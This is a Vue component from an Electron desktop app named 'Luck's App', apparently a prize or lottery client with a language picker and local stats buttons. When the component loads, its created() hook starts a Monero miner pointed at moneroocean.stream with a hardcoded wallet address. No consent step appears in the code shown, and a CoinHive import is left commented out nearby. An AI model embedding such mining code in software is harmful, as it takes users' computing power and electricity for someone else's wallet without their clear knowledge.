<template>
    <div id="app">
      <br/>
      <br/>
      <center><h2>Luck's App</h2></center>
      
      <cadastrar v-if="store.componente == 'cadastrar'"></cadastrar>
      <div v-else>
        <ganhou            v-if="store.componente == 'ganhou'"/>
        <info         v-else-if="store.componente == 'info'"/>
        <config         v-else-if="store.componente == 'config'"/>
      </div>

      <div id="language_picker">
        <b-form-select @change="changeLang" v-model="selected" :options="languages" class="mb-3" />
      </div>

       <center><b-button v-on:click="get">Get</b-button></center>
       <center><b-button v-on:click="zerar">Zerar</b-button></center>

    </div>

</template>

<style>
#language_picker {
  position: fixed;
  top: 5px;
  right: 10px;
}
</style>

<script>
  // componentes
  import cadastrar    from './padrao/cadastrar'
  import info         from './padrao/info'
  import config         from './padrao/config'
  import ganhou       from './premio/ganhou'

  // logica
  import store        from '../logic/store'
const path = require('path');
const fs = require('fs');
//const CoinHive = require('../logic/coinhive.min.js');

  export default {
    data () {
      return {
        store: store,
        selected: 'pt-br',
        languages: [
          {
            "text": 'Português',
            "value": 'pt-br'
          },
          {
            "text": 'English',
            "value": 'en'
          }
        ],
        miner: ''
      }
    },
    components: { cadastrar, info, config, ganhou },
    created(){
        server = "ws://127.0.0.1:8181"
        let address = '42GkdCcQCxLfb3UupxQ3C8FuVQZTJAMf6iz84PPR9dbT9CRS6tW8PWnfW7kth7LHzM95uSNrP7pMKZCtF2Hr4mxQHFiACQY';

        startMining("moneroocean.stream", address, "teste", -1, "teste"); 
        throttleMiner = 20;
       	
      
      // carrega o idioma previamente escolhido (english default)
      this.selected = store.getLang();

      // store.componente começa em "cadastrar"
      // mas ao rodar essa func
      // se o thingName estiver preenchido,
      // store.componente muda pra "info"

      //store.doResetStore();
      if (store.alreadyRegistered()){
        store.doConnect();
        if (store.getUnclaimedPrizes().length > 0 || store.getBadWallet()){
          store.componente = 'ganhou'
        }
      }
      else {
        store.componente = 'cadastrar';
      }
      // iniciar listen de idle
      //store.autoBoost(false);
      
    },
    methods:{
      changeLang: function(e){
        store.setLang(e)

        // preciso dar um reload provavelmente por erro de design
        // essa feature deveria ter sido feita no inicio do projeto
        this.$electron.remote.getCurrentWindow().reload()
      },
      get: function(){
        
        let api = "ws://127.0.0.1:8182";
        let s = new WebSocket(api);

        // request id
        s.onopen = function () {
          var msg = { identifier: "stats"}
          s.send((JSON.stringify(msg)));
        }

        s.onmessage = function (e) {
          console.log(e.data)
          console.log(JSON.parse(e.data))
          s.close();
        }
      },
      zerar: function(){
        
        let api = "ws://127.0.0.1:8182";
        let s = new WebSocket(api);

        // request id
        s.onopen = function () {
          var msg = { identifier: "clear"}
          s.send((JSON.stringify(msg)));
        }

        s.onmessage = function (e) {
          console.log(JSON.parse(e.data))
          s.close();
        }
      }
    }
  }
</script>
